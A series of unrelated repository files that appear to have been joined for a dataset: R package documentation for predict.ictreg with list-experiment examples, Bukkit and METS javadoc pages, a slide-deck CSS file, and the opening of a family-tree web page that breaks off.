<td><p>A glm object from a logistic binomial regression predicting responses to a direct survey item regarding the sensitive item. The predictions from the ictreg object are compared to the predictions based on this glm object.</p></td> </tr> <tr> <th>se.fit</th> <td><p>A switch indicating if standard errors are required.</p></td> </tr> <tr> <th>interval</th> <td><p>Type of interval calculation.</p></td> </tr> <tr> <th>level</th> <td><p>Significance level for confidence intervals.</p></td> </tr> <tr> <th>avg</th> <td><p>A switch indicating if the mean prediction and associated statistics across all obserations in the dataframe will be returned instead of predictions for each observation.</p></td> </tr> <tr> <th>sensitive.item</th> <td><p>For multiple sensitive item design list experiments, specify which sensitive item fits to use for predictions. Default is the first sensitive item.</p></td> </tr> <tr> <th>...</th> <td><p>further arguments to be passed to or from other methods.</p></td> </tr> </table> <h2 class="hasAnchor" id="value"><a class="anchor" href="#value"></a>Value</h2> <p><code>predict.ictreg</code> produces a vector of predictions or a matrix of predictions and bounds with column names fit, lwr, and upr if interval is set. If se.fit is TRUE, a list with the following components is returned:</p> <dt>fit</dt><dd><p>vector or matrix as above</p></dd> <dt>se.fit</dt><dd><p>standard error of prediction</p></dd> <h2 class="hasAnchor" id="details"><a class="anchor" href="#details"></a>Details</h2> <p><code>predict.ictreg</code> produces predicted values, obtained by evaluating the regression function in the frame newdata (which defaults to <code>model.frame(object)</code>. If the logical <code>se.fit</code> is <code>TRUE</code>, standard errors of the predictions are calculated. Setting <code>interval</code> specifies computation of confidence intervals at the specified level or no intervals.</p> <p>If <code>avg</code> is set to <code>TRUE</code>, the mean prediction across all observations in the dataset will be calculated, and if the <code>se.fit</code> option is set to <code>TRUE</code> a standard error for this mean estimate will be provided. The <code>interval</code> option will output confidence intervals instead of only the point estimate if set to <code>TRUE</code>.</p> <p>Two additional types of mean prediction are also available. The first, if a <code>newdata.diff</code> data frame is provided by the user, calculates the mean predicted values across two datasets, as well as the mean difference in predicted value. Standard errors and confidence intervals can also be added. For difference prediction, <code>avg</code> must be set to <code>TRUE</code>.</p> <p>The second type of prediction, triggered if a <code>direct.glm</code> object is provided by the user, calculates the mean difference in prediction between predictions based on an <code>ictreg</code> fit and a <code>glm</code> fit from a direct survey item on the sensitive question. This is defined as the revealed social desirability bias in Blair and Imai (2010).</p> <h2 class="hasAnchor" id="references"><a class="anchor" href="#references"></a>References</h2> <p>Blair, Graeme and Kosuke Imai. (2012) ``Statistical Analysis of List Experiments." Political Analysis, Vol. 20, No 1 (Winter). available at <a href='http://imai.princeton.edu/research/listP.html'>http://imai.princeton.edu/research/listP.html</a></p> <p>Imai, Kosuke. (2011) ``Multivariate Regression Analysis for the Item Count Technique.'' Journal of the American Statistical Association, Vol. 106, No. 494 (June), pp. 407-416. available at <a href='http://imai.princeton.edu/research/list.html'>http://imai.princeton.edu/research/list.html</a></p> <h2 class="hasAnchor" id="see-also"><a class="anchor" href="#see-also"></a>See also</h2> <p><code><a href='ictreg.html'>ictreg</a></code> for model fitting</p> <h2 class="hasAnchor" id="examples"><a class="anchor" href="#examples"></a>Examples</h2> <pre class="examples"><div class='input'> <span class='fu'>data</span>(<span class='no'>race</span>) <span class='no'>race.south</span> <span class='kw'>&lt;-</span> <span class='no'>race.nonsouth</span> <span class='kw'>&lt;-</span> <span class='no'>race</span> <span class='no'>race.south</span>[, <span class='st'>"south"</span>] <span class='kw'>&lt;-</span> <span class='fl'>1</span> <span class='no'>race.nonsouth</span>[, <span class='st'>"south"</span>] <span class='kw'>&lt;-</span> <span class='fl'>0</span></div><span class='co'># NOT RUN {</span> <span class='co'># Fit EM algorithm ML model with constraint with no covariates</span> <span class='no'>ml.results.south.nocov</span> <span class='kw'>&lt;-</span> <span class='fu'><a href='ictreg.html'>ictreg</a></span>(<span class='no'>y</span> ~ <span class='fl'>1</span>, <span class='kw'>data</span> <span class='kw'>=</span> <span class='no'>race</span>[<span class='no'>race</span>$<span class='no'>south</span> <span class='kw'>==</span> <span class='fl'>1</span>, ], <span class='kw'>method</span> <span class='kw'>=</span> <span class='st'>"ml"</span>, <span class='kw'>treat</span> <span class='kw'>=</span> <span class='st'>"treat"</span>, <span class='kw'>J</span> <span class='kw'>=</span> <span class='fl'>3</span>, <span class='kw'>overdispersed</span> <span class='kw'>=</span> <span class='fl'>FALSE</span>, <span class='kw'>constrained</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>) <span class='no'>ml.results.nonsouth.nocov</span> <span class='kw'>&lt;-</span> <span class='fu'><a href='ictreg.html'>ictreg</a></span>(<span class='no'>y</span> ~ <span class='fl'>1</span>, <span class='kw'>data</span> <span class='kw'>=</span> <span class='no'>race</span>[<span class='no'>race</span>$<span class='no'>south</span> <span class='kw'>==</span> <span class='fl'>0</span>, ], <span class='kw'>method</span> <span class='kw'>=</span> <span class='st'>"ml"</span>, <span class='kw'>treat</span> <span class='kw'>=</span> <span class='st'>"treat"</span>, <span class='kw'>J</span> <span class='kw'>=</span> <span class='fl'>3</span>, <span class='kw'>overdispersed</span> <span class='kw'>=</span> <span class='fl'>FALSE</span>, <span class='kw'>constrained</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>) <span class='co'># Calculate average predictions for respondents in the South </span> <span class='co'># and the the North of the US for the MLE no covariates </span> <span class='co'># model, replicating the estimates presented in Figure 1, </span> <span class='co'># Imai (2010)</span> <span class='no'>avg.pred.south.nocov</span> <span class='kw'>&lt;-</span> <span class='fu'>predict</span>(<span class='no'>ml.results.south.nocov</span>, <span class='kw'>newdata</span> <span class='kw'>=</span> <span class='fu'>as.data.frame</span>(<span class='fu'>matrix</span>(<span class='fl'>1</span>, <span class='fl'>1</span>, <span class='fl'>1</span>)), <span class='kw'>se.fit</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>, <span class='kw'>avg</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>) <span class='no'>avg.pred.nonsouth.nocov</span> <span class='kw'>&lt;-</span> <span class='fu'>predict</span>(<span class='no'>ml.results.nonsouth.nocov</span>, <span class='kw'>newdata</span> <span class='kw'>=</span> <span class='fu'>as.data.frame</span>(<span class='fu'>matrix</span>(<span class='fl'>1</span>, <span class='fl'>1</span>, <span class='fl'>1</span>)), <span class='kw'>se.fit</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>, <span class='kw'>avg</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>) <span class='co'># Fit linear regression</span> <span class='no'>lm.results</span> <span class='kw'>&lt;-</span> <span class='fu'><a href='ictreg.html'>ictreg</a></span>(<span class='no'>y</span> ~ <span class='no'>south</span> + <span class='no'>age</span> + <span class='no'>male</span> + <span class='no'>college</span>, <span class='kw'>data</span> <span class='kw'>=</span> <span class='no'>race</span>, <span class='kw'>treat</span> <span class='kw'>=</span> <span class='st'>"treat"</span>, <span class='kw'>J</span><span class='kw'>=</span><span class='fl'>3</span>, <span class='kw'>method</span> <span class='kw'>=</span> <span class='st'>"lm"</span>) <span class='co'># Calculate average predictions for respondents in the </span> <span class='co'># South and the the North of the US for the lm model, </span> <span class='co'># replicating the estimates presented in Figure 1, Imai (2010)</span> <span class='no'>avg.pred.south.lm</span> <span class='kw'>&lt;-</span> <span class='fu'>predict</span>(<span class='no'>lm.results</span>, <span class='kw'>newdata</span> <span class='kw'>=</span> <span class='no'>race.south</span>, <span class='kw'>se.fit</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>, <span class='kw'>avg</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>) <span class='no'>avg.pred.nonsouth.lm</span> <span class='kw'>&lt;-</span> <span class='fu'>predict</span>(<span class='no'>lm.results</span>, <span class='kw'>newdata</span> <span class='kw'>=</span> <span class='no'>race.nonsouth</span>, <span class='kw'>se.fit</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>, <span class='kw'>avg</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>) <span class='co'># Fit two-step non-linear least squares regression</span> <span class='no'>nls.results</span> <span class='kw'>&lt;-</span> <span class='fu'><a href='ictreg.html'>ictreg</a></span>(<span class='no'>y</span> ~ <span class='no'>south</span> + <span class='no'>age</span> + <span class='no'>male</span> + <span class='no'>college</span>, <span class='kw'>data</span> <span class='kw'>=</span> <span class='no'>race</span>, <span class='kw'>treat</span> <span class='kw'>=</span> <span class='st'>"treat"</span>, <span class='kw'>J</span><span class='kw'>=</span><span class='fl'>3</span>, <span class='kw'>method</span> <span class='kw'>=</span> <span class='st'>"nls"</span>) <span class='co'># Calculate average predictions for respondents in the South </span> <span class='co'># and the the North of the US for the NLS model, replicating</span> <span class='co'># the estimates presented in Figure 1, Imai (2010)</span> <span class='no'>avg.pred.nls</span> <span class='kw'>&lt;-</span> <span class='fu'>predict</span>(<span class='no'>nls.results</span>, <span class='kw'>newdata</span> <span class='kw'>=</span> <span class='no'>race.south</span>, <span class='kw'>newdata.diff</span> <span class='kw'>=</span> <span class='no'>race.nonsouth</span>, <span class='kw'>se.fit</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>, <span class='kw'>avg</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>) <span class='co'># Fit EM algorithm ML model with constraint</span> <span class='no'>ml.constrained.results</span> <span class='kw'>&lt;-</span> <span class='fu'><a href='ictreg.html'>ictreg</a></span>(<span class='no'>y</span> ~ <span class='no'>south</span> + <span class='no'>age</span> + <span class='no'>male</span> + <span class='no'>college</span>, <span class='kw'>data</span> <span class='kw'>=</span> <span class='no'>race</span>, <span class='kw'>treat</span> <span class='kw'>=</span> <span class='st'>"treat"</span>, <span class='kw'>J</span><span class='kw'>=</span><span class='fl'>3</span>, <span class='kw'>method</span> <span class='kw'>=</span> <span class='st'>"ml"</span>, <span class='kw'>overdispersed</span> <span class='kw'>=</span> <span class='fl'>FALSE</span>, <span class='kw'>constrained</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>) <span class='co'># Calculate average predictions for respondents in the South </span> <span class='co'># and the the North of the US for the MLE model, replicating the </span> <span class='co'># estimates presented in Figure 1, Imai (2010)</span> <span class='no'>avg.pred.diff.mle</span> <span class='kw'>&lt;-</span> <span class='fu'>predict</span>(<span class='no'>ml.constrained.results</span>, <span class='kw'>newdata</span> <span class='kw'>=</span> <span class='no'>race.south</span>, <span class='kw'>newdata.diff</span> <span class='kw'>=</span> <span class='no'>race.nonsouth</span>, <span class='kw'>se.fit</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>, <span class='kw'>avg</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>) <span class='co'># Calculate average predictions from the item count technique</span> <span class='co'># regression and from a direct sensitive item modeled with</span> <span class='co'># a logit.</span> <span class='co'># Estimate logit for direct sensitive question</span> <span class='fu'>data</span>(<span class='no'>mis</span>) <span class='no'>mis.list</span> <span class='kw'>&lt;-</span> <span class='fu'>subset</span>(<span class='no'>mis</span>, <span class='no'>list.data</span> <span class='kw'>==</span> <span class='fl'>1</span>) <span class='no'>mis.sens</span> <span class='kw'>&lt;-</span> <span class='fu'>subset</span>(<span class='no'>mis</span>, <span class='no'>sens.data</span> <span class='kw'>==</span> <span class='fl'>1</span>) <span class='co'># Fit EM algorithm ML model</span> <span class='no'>fit.list</span> <span class='kw'>&lt;-</span> <span class='fu'><a href='ictreg.html'>ictreg</a></span>(<span class='no'>y</span> ~ <span class='no'>age</span> + <span class='no'>college</span> + <span class='no'>male</span> + <span class='no'>south</span>, <span class='kw'>J</span> <span class='kw'>=</span> <span class='fl'>4</span>, <span class='kw'>data</span> <span class='kw'>=</span> <span class='no'>mis.list</span>, <span class='kw'>method</span> <span class='kw'>=</span> <span class='st'>"ml"</span>) <span class='co'># Fit logistic regression with directly-asked sensitive question</span> <span class='no'>fit.sens</span> <span class='kw'>&lt;-</span> <span class='fu'>glm</span>(<span class='no'>sensitive</span> ~ <span class='no'>age</span> + <span class='no'>college</span> + <span class='no'>male</span> + <span class='no'>south</span>, <span class='kw'>data</span> <span class='kw'>=</span> <span class='no'>mis.sens</span>, <span class='kw'>family</span> <span class='kw'>=</span> <span class='fu'>binomial</span>(<span class='st'>"logit"</span>)) <span class='co'># Predict difference between response to sensitive item</span> <span class='co'># under the direct and indirect questions (the list experiment).</span> <span class='co'># This is an estimate of the revealed social desirability bias</span> <span class='co'># of respondents. See Blair and Imai (2010).</span> <span class='no'>avg.pred.social.desirability</span> <span class='kw'>&lt;-</span> <span class='fu'>predict</span>(<span class='no'>fit.list</span>, <span class='kw'>direct.glm</span> <span class='kw'>=</span> <span class='no'>fit.sens</span>, <span class='kw'>se.fit</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>) <span class='co'># }</span><div class='input'> </div></pre> </div> <div class="col-md-3 hidden-xs hidden-sm" id="sidebar"> <h2>Contents</h2> <ul class="nav nav-pills nav-stacked"> <li><a href="#arguments">Arguments</a></li> <li><a href="#value">Value</a></li> <li><a href="#details">Details</a></li> <li><a href="#references">References</a></li> <li><a href="#see-also">See also</a></li> <li><a href="#examples">Examples</a></li> </ul> <h2>Author</h2> Graeme Blair, UCLA, <a href='mailto:graeme.blair@ucla.edu'>graeme.blair@ucla.edu</a> and Kosuke Imai, Princeton University, <a href='mailto:kimai@princeton.edu'>kimai@princeton.edu</a> </div> </div> <footer> <div class="copyright"> <p>Developed by Graeme Blair, Kosuke Imai.</p> </div> <div class="pkgdown"> <p>Site built with <a href="http://pkgdown.r-lib.org/">pkgdown</a>.</p> </div> </footer> </div> </body> </html>
org/bukkit/configuration/file/class-use/YamlConfigurationOptions.html
mcuserjp/bukkit_javadoc
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="ja"> <head> <!-- Generated by javadoc (1.8.0_40) on Sun Apr 10 20:00:10 JST 2016 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>クラス org.bukkit.configuration.file.YamlConfigurationOptionsの使用 (Bukkit 1.9.2-R0.1-SNAPSHOT API)</title> <meta name="date" content="2016-04-10"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="\u30AF\u30E9\u30B9 org.bukkit.configuration.file.YamlConfigurationOptions\u306E\u4F7F\u7528 (Bukkit 1.9.2-R0.1-SNAPSHOT API)"; } } catch(err) { } //--> </script> <noscript> <div>ブラウザのJavaScriptが無効になっています。</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="ナビゲーション・リンクをスキップ">ナビゲーション・リンクをスキップ</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="ナビゲーション"> <li><a href="../../../../../overview-summary.html">概要</a></li> <li><a href="../package-summary.html">パッケージ</a></li> <li><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html" title="org.bukkit.configuration.file内のクラス">クラス</a></li> <li class="navBarCell1Rev">使用</li> <li><a href="../package-tree.html">階層ツリー</a></li> <li><a href="../../../../../deprecated-list.html">非推奨</a></li> <li><a href="../../../../../index-all.html">索引</a></li> <li><a href="../../../../../help-doc.html">ヘルプ</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>前</li> <li>次</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/bukkit/configuration/file/class-use/YamlConfigurationOptions.html" target="_top">フレーム</a></li> <li><a href="YamlConfigurationOptions.html" target="_top">フレームなし</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">すべてのクラス</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="クラスの使用 org.bukkit.configuration.file.YamlConfigurationOptions" class="title">クラスの使用<br>org.bukkit.configuration.file.YamlConfigurationOptions</h2> </div> <div class="classUseContainer"> <ul class="blockList"> <li class="blockList"> <table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="表、パッケージのリストおよび説明の使用"> <caption><span><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html" title="org.bukkit.configuration.file内のクラス">YamlConfigurationOptions</a>を使用しているパッケージ</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">パッケージ</th> <th class="colLast" scope="col">説明</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="#org.bukkit.configuration.file">org.bukkit.configuration.file</a></td> <td class="colLast"> <div class="block">Classes dedicated facilitating <a href="../../../../../org/bukkit/configuration/Configuration.html" title="org.bukkit.configuration内のインタフェース"><code>configurations</code></a> to be read and stored on the filesystem.</div> </td> </tr> </tbody> </table> </li> <li class="blockList"> <ul class="blockList"> <li class="blockList"><a name="org.bukkit.configuration.file"> <!-- --> </a> <h3><a href="../../../../../org/bukkit/configuration/file/package-summary.html">org.bukkit.configuration.file</a>での<a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html" title="org.bukkit.configuration.file内のクラス">YamlConfigurationOptions</a>の使用</h3> <table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="表、メソッドのリストおよび説明の使用"> <caption><span><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html" title="org.bukkit.configuration.file内のクラス">YamlConfigurationOptions</a>を返す<a href="../../../../../org/bukkit/configuration/file/package-summary.html">org.bukkit.configuration.file</a>のメソッド</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">修飾子とタイプ</th> <th class="colLast" scope="col">メソッドと説明</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html" title="org.bukkit.configuration.file内のクラス">YamlConfigurationOptions</a></code></td> <td class="colLast"><span class="typeNameLabel">YamlConfigurationOptions.</span><code><span class="memberNameLink"><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html#copyDefaults-boolean-">copyDefaults</a></span>(boolean&nbsp;value)</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html" title="org.bukkit.configuration.file内のクラス">YamlConfigurationOptions</a></code></td> <td class="colLast"><span class="typeNameLabel">YamlConfigurationOptions.</span><code><span class="memberNameLink"><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html#copyHeader-boolean-">copyHeader</a></span>(boolean&nbsp;value)</code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html" title="org.bukkit.configuration.file内のクラス">YamlConfigurationOptions</a></code></td> <td class="colLast"><span class="typeNameLabel">YamlConfigurationOptions.</span><code><span class="memberNameLink"><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html#header-java.lang.String-">header</a></span>(<a href="http://docs.oracle.com/javase/8/docs/api/java/lang/String.html?is-external=true" title="java.lang内のクラスまたはインタフェース">String</a>&nbsp;value)</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html" title="org.bukkit.configuration.file内のクラス">YamlConfigurationOptions</a></code></td> <td class="colLast"><span class="typeNameLabel">YamlConfigurationOptions.</span><code><span class="memberNameLink"><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html#indent-int-">indent</a></span>(int&nbsp;value)</code> <div class="block">Sets how much spaces should be used to indent each line.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html" title="org.bukkit.configuration.file内のクラス">YamlConfigurationOptions</a></code></td> <td class="colLast"><span class="typeNameLabel">YamlConfiguration.</span><code><span class="memberNameLink"><a href="../../../../../org/bukkit/configuration/file/YamlConfiguration.html#options--">options</a></span>()</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html" title="org.bukkit.configuration.file内のクラス">YamlConfigurationOptions</a></code></td> <td class="colLast"><span class="typeNameLabel">YamlConfigurationOptions.</span><code><span class="memberNameLink"><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html#pathSeparator-char-">pathSeparator</a></span>(char&nbsp;value)</code>&nbsp;</td> </tr> </tbody> </table> </li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="ナビゲーション・リンクをスキップ">ナビゲーション・リンクをスキップ</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="ナビゲーション"> <li><a href="../../../../../overview-summary.html">概要</a></li> <li><a href="../package-summary.html">パッケージ</a></li> <li><a href="../../../../../org/bukkit/configuration/file/YamlConfigurationOptions.html" title="org.bukkit.configuration.file内のクラス">クラス</a></li> <li class="navBarCell1Rev">使用</li> <li><a href="../package-tree.html">階層ツリー</a></li> <li><a href="../../../../../deprecated-list.html">非推奨</a></li> <li><a href="../../../../../index-all.html">索引</a></li> <li><a href="../../../../../help-doc.html">ヘルプ</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>前</li> <li>次</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/bukkit/configuration/file/class-use/YamlConfigurationOptions.html" target="_top">フレーム</a></li> <li><a href="YamlConfigurationOptions.html" target="_top">フレームなし</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">すべてのクラス</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &#169; 2016. All rights reserved.</small></p> </body> </html>
Libraries/Mets/crosswalk_mets/doc/index-files/index-16.html
rd-switchboard/Inference
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_65) on Fri Oct 31 14:40:01 EST 2014 --> <title>T-Index</title> <meta name="date" content="2014-10-31"> <link rel="stylesheet" type="text/css" href="../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="T-Index"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li>Package</li> <li>Class</li> <li>Use</li> <li><a href="../overview-tree.html">Tree</a></li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li class="navBarCell1Rev">Index</li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="index-15.html">Prev Letter</a></li> <li><a href="index-17.html">Next Letter</a></li> </ul> <ul class="navList"> <li><a href="../index.html?index-filesindex-16.html" target="_top">Frames</a></li> <li><a href="index-16.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="contentContainer"><a href="index-1.html">A</a>&nbsp;<a href="index-2.html">B</a>&nbsp;<a href="index-3.html">C</a>&nbsp;<a href="index-4.html">D</a>&nbsp;<a href="index-5.html">F</a>&nbsp;<a href="index-6.html">G</a>&nbsp;<a href="index-7.html">H</a>&nbsp;<a href="index-8.html">I</a>&nbsp;<a href="index-9.html">L</a>&nbsp;<a href="index-10.html">M</a>&nbsp;<a href="index-11.html">N</a>&nbsp;<a href="index-12.html">O</a>&nbsp;<a href="index-13.html">P</a>&nbsp;<a href="index-14.html">R</a>&nbsp;<a href="index-15.html">S</a>&nbsp;<a href="index-16.html">T</a>&nbsp;<a href="index-17.html">V</a>&nbsp;<a name="_T_"> <!-- --> </a> <h2 class="title">T</h2> <dl> <dt><span class="strong"><a href="../org/grants/importers/mets/DoiRelation.html#type">type</a></span> - Variable in class org.grants.importers.mets.<a href="../org/grants/importers/mets/DoiRelation.html" title="class in org.grants.importers.mets">DoiRelation</a></dt> <dd>&nbsp;</dd> </dl> <a href="index-1.html">A</a>&nbsp;<a href="index-2.html">B</a>&nbsp;<a href="index-3.html">C</a>&nbsp;<a href="index-4.html">D</a>&nbsp;<a href="index-5.html">F</a>&nbsp;<a href="index-6.html">G</a>&nbsp;<a href="index-7.html">H</a>&nbsp;<a href="index-8.html">I</a>&nbsp;<a href="index-9.html">L</a>&nbsp;<a href="index-10.html">M</a>&nbsp;<a href="index-11.html">N</a>&nbsp;<a href="index-12.html">O</a>&nbsp;<a href="index-13.html">P</a>&nbsp;<a href="index-14.html">R</a>&nbsp;<a href="index-15.html">S</a>&nbsp;<a href="index-16.html">T</a>&nbsp;<a href="index-17.html">V</a>&nbsp;</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li>Package</li> <li>Class</li> <li>Use</li> <li><a href="../overview-tree.html">Tree</a></li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li class="navBarCell1Rev">Index</li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="index-15.html">Prev Letter</a></li> <li><a href="index-17.html">Next Letter</a></li> </ul> <ul class="navList"> <li><a href="../index.html?index-filesindex-16.html" target="_top">Frames</a></li> <li><a href="index-16.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
docs/lpw17/css/extra.css
JJ/perl6em
@import url('https://fonts.googleapis.com/css?family=Modak'); section[data-background] h1 { background-color:rgba(200,200,200,0.7); padding: 50px; margin: 20px; border-radius: 30px } section[data-background] h2 { background-color:rgba(220,220,220,0.6); padding: 20px; margin: 40px; border-radius: 30px } section[data-background] h3 { background-color:rgba(230,230,230,0.5); padding: 20px; margin: 70px; border-radius: 30px } .cool { background-color:rgba(102, 255, 255,0.7); padding: 30px; margin: 30px; border-radius: 40px; } .hl { background-color:rgba(255, 255, 0,0.7); padding: 30px; margin: 30px; border-radius: 40px; } .pink { background-color:rgba(255, 192, 203,0.7); padding: 5px; margin: 10px; border-radius: 3px } .bkg { background-color:rgba(0,43,54,0.7); padding: 30px; margin: 15px; border-radius: 10px } .reveal li { font-size:1.75em } .reveal li.credits { font-size:0.75em } .credits { -moz-column-count: 2; -webkit-column-count: 2; column-count: 2; } .credits li { font-size:0.75em } .chart div { font: 30px sans-serif; background-color: orange; text-align: right; padding: 5px; margin: 3px; color: white; } .fija div { font: 14px "Fira Mono"; background-color: blue; text-align: right; padding: 2px; margin: 1px; color: #ff2c2d; } /* Posición fija */ #fija { position: fixed; border: 3px solid orange; top: 0; right: 0; width: 200px; z-index: 1; } .reveal.slide .slides > section, .reveal.slide .slides > section > section { min-height: 100% !important; display: flex !important; flex-direction: column !important; justify-content: center !important; position: absolute !important; top: 0 !important; align-items: center !important; } .print-pdf .reveal.slide .slides > section, .print-pdf .reveal.slide .slides > section > section { min-height: 770px !important; position: relative !important; } h1.title{ font-size: 7em; font-family: 'Modak', cursive; }
RossFamilyTree/ppl/6/9/d15f60350cf6e62fb5b46d1b496.html
RossGammon/the-gammons.net
<!DOCTYPE html> <html xml:lang="en-GB" lang="en-GB" xmlns="http://www.w3.org/1999/xhtml"> <head lang="en-GB"> <title>Ross Gammon’s Family Tree - ROGERS, Douglas James</title> <meta charset="UTF-8" /> <meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" /> <meta name ="apple-mobile-web-app-capable" content="yes" /> <meta name="generator" content="Gramps 4.2.8 http://gramps-project.org/" /> <meta name="author" content="" /> <link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" /> <link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" /> <link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" /> <link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" /> </head> <body> <div id="header"> <h1 id="SiteTitle">Ross Gammon’s Family Tree</h1> </div> <div class="wrapper" id="nav" role="navigation"> <div class="container"> <ul class="menu" id="dropmenu"> <li class = "CurrentSection"><a href="../../../individuals.html" 